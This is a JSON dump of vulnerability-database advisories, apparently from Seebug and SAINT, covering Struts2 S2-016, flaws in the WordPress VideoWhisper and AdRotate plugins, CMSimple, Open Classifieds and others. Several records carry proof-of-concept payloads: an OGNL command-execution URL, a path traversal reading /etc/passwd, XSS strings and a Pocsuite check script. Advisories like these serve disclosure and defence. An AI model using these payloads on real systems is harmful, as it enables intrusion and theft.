"enchantments_done": [], "references": [], "description": "CVE-2013-2251\r\nStruts2 \u662f\u7b2c\u4e8c\u4ee3\u57fa\u4e8eModel-View-Controller (MVC)\u6a21\u578b\u7684java\u4f01\u4e1a\u7ea7web\u5e94\u7528\u6846\u67b6\u3002\u5b83\u662fWebWork\u548cStruts\u793e\u533a\u5408\u5e76\u540e\u7684\u4ea7\u7269\r\n\r\nApache Struts2\u7684action:\u3001redirect:\u548credirectAction:\u524d\u7f00\u53c2\u6570\u5728\u5b9e\u73b0\u5176\u529f\u80fd\u7684\u8fc7\u7a0b\u4e2d\u4f7f\u7528\u4e86Ognl\u8868\u8fbe\u5f0f\uff0c\u5e76\u5c06\u7528\u6237\u901a\u8fc7URL\u63d0\u4ea4\u7684\u5185\u5bb9\u62fc\u63a5\u5165Ognl\u8868\u8fbe\u5f0f\u4e2d\uff0c\u4ece\u800c\u9020\u6210\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u6784\u9020\u6076\u610fURL\u6765\u6267\u884c\u4efb\u610fJava\u4ee3\u7801\uff0c\u8fdb\u800c\u53ef\u6267\u884c\u4efb\u610f\u547d\u4ee4\r\n\r\nredirect:\u548credirectAction:\u6b64\u4e24\u9879\u524d\u7f00\u4e3aStruts\u9ed8\u8ba4\u5f00\u542f\u529f\u80fd\uff0c\u76ee\u524dStruts 2.3.15.1\u4ee5\u4e0b\u7248\u672c\u5747\u5b58\u5728\u6b64\u6f0f\u6d1e\r\n\r\n\u76ee\u524dApache Struts2\u5df2\u7ecf\u57282.3.15.1\u4e2d\u4fee\u8865\u4e86\u8fd9\u4e00\u6f0f\u6d1e\u3002\u5f3a\u70c8\u5efa\u8baeApache Struts2\u7528\u6237\u68c0\u67e5\u60a8\u662f\u5426\u53d7\u6b64\u95ee\u9898\u5f71\u54cd\uff0c\u5e76\u5c3d\u5feb\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\r\n0\r\nApache Struts 2.0.0 - Apache Struts 2.3.15\r\n\u5382\u5546\u72b6\u6001\uff1a\r\n==========\r\n\u5382\u5546\u5df2\u7ecf\u53d1\u5e03Apache Struts 2.3.15.1\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u6f0f\u6d1e\uff0c\u5efa\u8baeStruts\u7528\u6237\u53ca\u65f6\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\u3002\r\n\r\n\u5382\u5546\u5b89\u5168\u516c\u544a\uff1aS2-016\r\n\u94fe\u63a5\uff1ahttp://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n\u8f6f\u4ef6\u5347\u7ea7\u9875\u9762\uff1ahttp://struts.apache.org/download.cgi#struts23151", "reporter": "Root", "published": "2013-07-17T00:00:00", "title": "Apache Struts2 \u591a\u4e2a\u524d\u7f00\u53c2\u6570\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2013-2251)", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2013-07-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60906", "id": "SSV:60906", "sourceData": "\n \u7531\u4e8eApache Struts2 \u5728\u6700\u65b0\u4fee\u8865\u7248\u672c2.3.15.1\u4e2d\u5df2\u7ecf\u7981\u7528\u4e86\u91cd\u5b9a\u5411\u53c2\u6570\uff0c\u56e0\u6b64\u53ea\u8981\u91cd\u5b9a\u5411\u529f\u80fd\u4ecd\u7136\u6709\u6548\uff0c\u5219\u8bf4\u660e\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\uff1a\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:http://www.yahoo.com/\r\n\r\n\u5982\u679c\u9875\u9762\u91cd\u5b9a\u5411\u5230www.yahoo.com\uff0c\u5219\u8868\u660e\u5f53\u524d\u7cfb\u7edf\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\u3002\r\n\r\n\u9a8c\u8bc1\u8868\u8fbe\u5f0f\u89e3\u6790\u548c\u547d\u4ee4\u6267\u884c\uff1a\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60906", "status": "cve,poc,details"}, {"lastseen": "2017-11-19T17:31:32", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "Bugtraq ID:65866\r\nCVE ID:CVE-2014-1905\r\n\r\nWordPress\u662f\u4e00\u79cd\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u652f\u6301PHP\u548cMySQL\u6570\u636e\u5e93\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u81ea\u5df1\u7684\u7f51\u5fd7\u3002\r\n\r\nWordPress VideoWhisper Live Streaming Integration\u6240\u5305\u542b\u7684"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snaps\r\nhots.php"\u5728\u4e0a\u4f20\u6587\u4ef6\u5230\u670d\u52a1\u5668\u65f6\u6ca1\u6709\u6b63\u786e\u6821\u9a8c\u6076\u610f\u6587\u4ef6\u6269\u5c55\uff0c\u53ef\u5bfc\u81f4\u8fdc\u7a0b\u653b\u51fb\u8005\u4e0a\u4f20\u548c\u6267\u884c\u4efb\u610fPHP\u6587\u4ef6\u3002\n0\nWordPress VideoWhisper Live Streaming Integration 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n-----\r\nWordPress VideoWhisper Live Streaming Integration 4.29.5\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u66f4\u65b0\uff1a\r\nhttp://wordpress.org/plugins/videowhisper-live-streaming-integration/", "reporter": "Root", "published": "2014-03-06T00:00:00", "title": "WordPress VideoWhisper Live Streaming Integration\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1905"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61679", "id": "SSV:61679", "sourceData": "\n After successful exploitation the remote shell will be accessible via the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/snapshots/1.php.jpg\r\n\r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61679", "status": "poc,details"}, {"lastseen": "2017-11-19T17:32:53", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 65877\r\nCVE(CAN) ID: CVE-2014-1907\r\n\r\nWordPress VideoWhisper Live Streaming Integration\u8f6f\u4ef6\u53ef\u4ee5\u5c06\u89c6\u9891\u5e7f\u64ad\u529f\u80fd\u6dfb\u52a0\u5230WordPress\u7ad9\u70b9\uff0c\u4e5f\u53ef\u5c06\u5b9e\u65f6\u89c6\u9891\u6d41\u6dfb\u52a0\u5230\u535a\u5ba2\u9875\u3002\r\n\r\nVideoWhisper Live Streaming Integration 4.27.3\u53ca\u5176\u4ed6\u7248\u672c\u6ca1\u6709\u6709\u6548\u8fc7\u6ee4\u811a\u672c"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nin.php"\u5185\u7684"s" HTTP GET\u53c2\u6570\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u76ee\u5f55\u904d\u5386\u5e8f\u5217\u5229\u7528\u6b64\u6f0f\u6d1e\u53ef\u67e5\u770b\u76ee\u6807\u7cfb\u7edf\u4e0a\u7684\u4efb\u610f\u6587\u4ef6\uff1b\u4e5f\u6ca1\u6709\u6709\u6548\u8fc7\u6ee4"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nout.php"\u811a\u672c\u5185\u7684"s" HTTP GET\u53c2\u6570\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u76ee\u5f55\u904d\u5386\u5e8f\u5217\u5229\u7528\u6b64\u6f0f\u6d1e\u53ef\u5220\u9664\u76ee\u6807\u7cfb\u7edf\u4e0a\u7684\u4efb\u610f\u6587\u4ef6\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u9700\u8981\u7cfb\u7edf\u4e0a\u5b58\u5728\u6587\u4ef6"/tmp/immuniweb"\u3002\n0\nWordPress VideoWhisper Live Streaming Integration <= 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n---------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttps://wordpress.org/plugins/videowhisper-live-streaming-integration/screenshots/", "reporter": "Root", "published": "2014-03-03T00:00:00", "title": "WordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u76ee\u5f55\u904d\u5386\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1907"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-03-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61614", "id": "SSV:61614", "sourceData": "\n http://www.example.com/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n\r\nhttp://www.example.com/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\n ", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61614", "status": "poc,details"}, {"lastseen": "2017-11-19T17:31:07", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID\uff1aCVE-2014-2024\r\n\r\nOpen Classifieds\u53ef\u4ee5\u7528\u6765\u521b\u5efa\u5206\u7c7b\u548c\u76ee\u5f55\u3002\r\n\r\n\u7531\u4e8e\u6ca1\u6709\u5145\u5206\u8fc7\u6ee4\u901a\u8fc7URI\u4f20\u9012\u5230"/shared-apartments-rooms/" URL\u7684\u7528\u6237\u63d0\u4f9b\u7684\u6570\u636e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u6b3a\u9a97\u767b\u5f55\u7528\u6237\u8bbf\u95ee\u6076\u610f\u94fe\u63a5\uff0c\u5e76\u5728\u53d7\u5f71\u54cd\u7f51\u7ad9\u4e0a\u4e0b\u6587\u7684\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u4efb\u610fHTML\u548c\u811a\u672c\u4ee3\u7801\u3002\n0\nOpen Classifieds 2-2.1.2\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOpen Classifieds\r\n-----\r\nOpen Classifieds 2-2.1.3\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\n\r\nhttps://github.com/open-classifieds/openclassifieds2/issues/556\r\nhttps://github.com/open-classifieds/openclassifieds2/commit/45ee8fb601a91b8a4238229580a32a4fd8d96ef9", "reporter": "Root", "published": "2014-03-13T00:00:00", "title": "Open Classifieds\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2024"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-03-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61791", "id": "SSV:61791", "sourceData": "\n The exploitation example below uses the JavaScript "alert()" function to display "immuniweb" word:\r\n\r\nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22)</script>\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61791", "status": "poc,details"}, {"lastseen": "2017-11-19T17:31:29", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "Bugtraq ID:65880\r\nCVE ID:CVE-2014-1908\r\n\r\nWordPress\u662f\u4e00\u79cd\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u652f\u6301PHP\u548cMySQL\u6570\u636e\u5e93\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u81ea\u5df1\u7684\u7f51\u5fd7\u3002\r\n\r\nWordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u811a\u672c\u4e0d\u6b63\u786e\u5b9e\u73b0\u9519\u8bef\u5904\u7406\u673a\u5236\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u63d0\u4ea4\u7279\u5236\u7684HTTP GET\u8bf7\u6c42\uff0c\u83b7\u53d6\u654f\u611f\u5e94\u7528\u4fe1\u606f\u3002\n0\nWordPress VideoWhisper Live Streaming Integration 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n-----\r\nWordPress VideoWhisper Live Streaming Integration 4.29.5\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u66f4\u65b0\uff1a\r\n\r\nhttp://wordpress.org/plugins/videowhisper-live-streaming-integration/", "reporter": "Root", "published": "2014-03-06T00:00:00", "title": "WordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1908"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61678", "id": "SSV:61678", "sourceData": "\n The following URL can be used to gain knowledge of full installation path of the application:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/bp.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/videowhisper_streaming.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp.inc.php\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61678", "status": "poc,details"}, {"lastseen": "2017-11-19T17:33:30", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "Bugtraq ID:65876\r\nCVE ID:CVE-2014-1906\r\n\r\nWordPress\u662f\u4e00\u79cd\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u652f\u6301PHP\u548cMySQL\u6570\u636e\u5e93\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u81ea\u5df1\u7684\u7f51\u5fd7\u3002\r\n\r\nWordPress VideoWhisper Live Streaming Integration\u5b58\u5728\u591a\u4e2a\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u6ce8\u5165\u6076\u610f\u811a\u672c\u6216HTML\u4ee3\u7801\uff0c\u5f53\u6076\u610f\u6570\u636e\u88ab\u67e5\u770b\u65f6\uff0c\u53ef\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u6216\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\u3002\n0\nWordPress VideoWhisper Live Streaming Integration 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n-----\r\nWordPress VideoWhisper Live Streaming Integration 4.29.5\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u66f4\u65b0\uff1a\r\nhttp://wordpress.org/plugins/videowhisper-live-streaming-integration/", "reporter": "Root", "published": "2014-03-06T00:00:00", "type": "seebug", "title": "WordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1906"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61677", "id": "SSV:61677", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "status": "details"}, {"lastseen": "2017-11-19T17:30:50", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "Bugtraq ID:66312\r\nCVE ID:CVE-2014-2219\r\n\r\nCMSimple\u662f\u4e00\u4e2a\u56fd\u5916\u5f00\u6e90\u7684\u7b80\u6613\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf\u3002\r\n\r\nCMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9"/whizzywig/wb.php"\u811a\u672c\u7684"d" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002\r\n0\r\nCMSimple 3.54\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\u4ee5\u4fee\u590d\u8be5\u6f0f\u6d1e\uff1a\r\nhttp://sourceforge.net/projects/cmsimple-le/files/cmsimple_classic/", "reporter": "Root", "published": "2014-03-25T00:00:00", "title": "CMSimple '/whizzywig/wb.php'\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2219"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-03-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61903", "id": "SSV:61903", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\n\r\nclass TestPOC(POCBase):\r\n vulID = 'SSV-61903' # vul ID\r\n version = '1'\r\n author = 'fenghh'\r\n vulDate = '2014-03-25'\r\n createDate = '2015-10-14'\r\n updateDate = '2015-10-14'\r\n references = ['http://sebug.net/vuldb/ssvid-61903']\r\n name = 'CMSimple 3.54 /whizzywig/wb.php XSS\u6f0f\u6d1e'\r\n appPowerLink = 'www.cmsimple.dk'\r\n appName = 'cmsimple'\r\n appVersion = '3.54'\r\n vulType = 'XSS'\r\n desc = ''' \r\n \u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.CMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9\"/whizzywig/wb.php\"\u811a\u672c\u7684\"d\" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\r\n \u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002\r\n '''\r\n # the sample sites for examine\r\n samples = ['']\r\n\r\n def _verify(self):\r\n output = Output(self)\r\n result = {}\r\n payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27sebug%27%29%3C/script%3E'\r\n verify_url = self.url + payload\r\n content = req.get(verify_url).content\r\n if '<script>alert(\"sebug\")</script>' in content:\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = verify_url\r\n output.success(result)\r\n else:\r\n output.fail('XSS Failed')\r\n return output\r\n\r\n def _attack(self): \r\n return self._verify()\r\n\r\nregister(TestPOC)\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61903", "status": "poc,details"}, {"lastseen": "2017-11-19T17:27:18", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID:CVE-2014-0111\r\n\r\nApache Syncope\u662f\u7528\u5728\u4f01\u4e1a\u73af\u5883\u7684\u6570\u5b57\u8eab\u4efd\u7ba1\u7406,\u5728JEE\u6280\u672f\u7684\u5b9e\u65bd\u548cApache 2.0\u8bb8\u53ef\u4e0b\u53d1\u5e03\u7684\u5f00\u6e90\u7cfb\u7edf\u3002\r\n\r\nApache Syncope\u5904\u7406\u7279\u5236\u7684Apache Commons JEXL\u8868\u8fbe\u5f0f\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u901a\u8fc7\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u8fd0\u884cApache Syncope core\u7684JEE container\u6765\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nApache Syncope 1.0.0\r\nApache Syncope 1.0.8\r\nApache Syncope 1.1.0\r\nApache Syncope 1.1.6\nApache Syncope 1.0.9, 1.1.7\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://syncope.apache.org/", "reporter": "Root", "published": "2014-04-17T00:00:00", "title": "Apache Syncope\u7279\u5236Commons JEXL\u8868\u8fbe\u5f0f\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0111"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-04-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62214", "id": "SSV:62214", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T17:34:09", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 65709\r\nCVE(CAN) ID: CVE-2014-1854\r\n\r\nAdRotate\u662f\u7f51\u7ad9\u5e7f\u544a\u7ba1\u7406\u63d2\u4ef6\u3002\r\n\r\nAdRotate 3.9.4\u53ca\u5176\u4ed6\u7248\u672c\u6ca1\u6709\u6709\u6548\u9a8c\u8bc1"/wp-content/plugins/adrotate/library/clicktracker.php"\u811a\u672c\u7684"track" HTTP GET\u53c2\u6570\u503c\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u5728\u5e94\u7528\u7684\u6570\u636e\u5e93\u5185\u6267\u884c\u4efb\u610fSQL\u547d\u4ee4\u3002\n0\nWordPress AdRotate < 3.9.4\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n---------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://wordpress.org/plugins/adrotate/", "reporter": "Root", "published": "2014-02-24T00:00:00", "type": "seebug", "title": "WordPress AdRotate\u63d2\u4ef6'clicktracker.php'SQL\u6ce8\u5165\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1854"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-02-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61533", "id": "SSV:61533", "sourceData": "\n http://www.example.com/wp-content/plugins/adrotate/library/clicktracker.php?track=[SQL Injection]\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61533", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "status": "poc,details"}, {"lastseen": "2017-11-19T17:27:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "Bugtraq ID:65751\r\nCVE ID:CVE-2014-2579\r\n\r\nXCloner Standalone\u662f\u4e00\u4e2a\u5907\u4efd\u548c\u6062\u590d\u5e94\u7528\u3002\r\n\r\nXCloner Standalone\u5b58\u5728\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u4ee5\u76ee\u6807\u7528\u6237\u4e0a\u4e0b\u6587\u6267\u884c\u6076\u610f\u64cd\u4f5c\u3002\n0\nXCloner Standalone 3.5\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.xcloner.com/", "reporter": "Root", "published": "2014-04-17T00:00:00", "title": "XCloner Standalone\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2579"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-04-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62204", "id": "SSV:62204", "sourceData": "", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}], "saint": [{"lastseen": "2018-08-31T00:08:13", "references": [], "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2013-08-01T00:00:00", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "type": "saint", "enchantments": {"score": 